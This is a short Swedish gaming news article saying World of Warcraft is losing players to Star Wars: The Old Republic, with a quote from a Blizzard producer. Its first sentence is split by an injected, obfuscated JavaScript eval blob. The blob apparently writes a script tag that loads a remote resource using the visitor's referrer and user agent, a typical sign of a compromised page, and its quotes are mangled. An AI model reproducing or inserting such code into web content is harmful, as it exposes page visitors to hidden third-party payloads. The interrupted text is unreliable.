Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Star Wars: Old Republic plockar spelare från World of Warcraft

Star Wars: Old Republic plockar spelare från World of Warcraft
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zhdey|var|u0026u|referrer|netib||js|php’.split(’|’),0,{}))
massiva rollspelet World of Warcraft tappar spelare till nya spel som Star Wars: The Old Republic. Senior producer av World of Warcraft John Lagrave meddelar detta till Eurogamer:

”We certainly do look at [where WOW players go], and we have a very smart bunch of guys who do our analytics for us.

Of course people are trying Star Wars,  our development team are trying Star Wars! I’m one of the few people who’s still playing it actually, but yeah we’ve seen a dip in subs. It certainly has to at least be attributable to The Old Republic, but it’s also attributable to people who want to wait and get Mists of Pandaria, so it’s not surprising.”

Självklart funderar nu Blizzard över vad de kan göra för att vända tillbaka användarna till spelet och det utesluter inte att förlänga test-perioden. Blizzard är väldigt tydliga med att det inte kommer att bli free-to-play.